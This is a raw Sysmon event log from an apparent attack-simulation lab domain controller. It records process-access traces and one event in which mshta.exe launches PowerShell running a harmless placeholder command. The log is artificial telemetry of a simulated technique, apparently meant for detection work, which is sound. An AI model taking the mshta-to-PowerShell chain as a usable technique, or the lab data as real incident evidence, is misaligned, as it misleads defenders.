15:59:33.007{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5364-6008-6006-00000000A301}6448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025852Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.007{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5364-6008-6006-00000000A301}6448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026067Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.444{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5366-6008-6306-00000000A301}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026066Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.444{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5366-6008-6306-00000000A301}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026065Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.397{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5366-6008-6306-00000000A301}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026064Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.397{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5366-6008-6306-00000000A301}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000026063Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.366{7901BC46-5366-6008-6306-00000000A301}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_40wa2bfu.5l3.ps12021-01-20 15:59:34.366 10341000x800000000000000026062Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.350{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5366-6008-6306-00000000A301}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026061Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.303{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5366-6008-6406-00000000A301}6528C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026060Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.303{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5366-6008-6406-00000000A301}6528C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026059Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.303{7901BC46-5366-6008-6406-00000000A301}65283188C:\Windows\system32\conhost.exe{7901BC46-5366-6008-6306-00000000A301}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026058Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.303{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5366-6008-6406-00000000A301}6528C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026057Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.288{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026056Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.288{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026055Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.288{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026054Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.288{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026053Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.288{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5366-6008-6306-00000000A301}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026052Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.288{7901BC46-5366-6008-6206-00000000A301}44887444C:\Windows\System32\mshta.exe{7901BC46-5366-6008-6306-00000000A301}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000026051Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.298{7901BC46-5366-6008-6306-00000000A301}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-5366-6008-6206-00000000A301}4488C:\Windows\System32\mshta.exeC:\Windows\System32\mshta.exe -Embedding 10341000x800000000000000026050Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.272{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5366-6008-6206-00000000A301}4488C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026049Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.256{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5366-6008-6206-00000000A301}4488C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026048Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.256{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5366-6008-6206-00000000A301}4488C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026047Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.256{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5366-6008-6206-00000000A301}4488C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026046Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.241{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5366-6008-6206-00000000A301}4488C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026045Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.241{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5366-6008-6206-00000000A301}4488C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026044Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.241{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5366-6008-6206-00000000A301}4488C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026043Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.225{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5366-6008-6206-00000000A301}4488C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026042Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.225{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026041Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.225{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026040Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.225{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026039Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.225{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026038Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 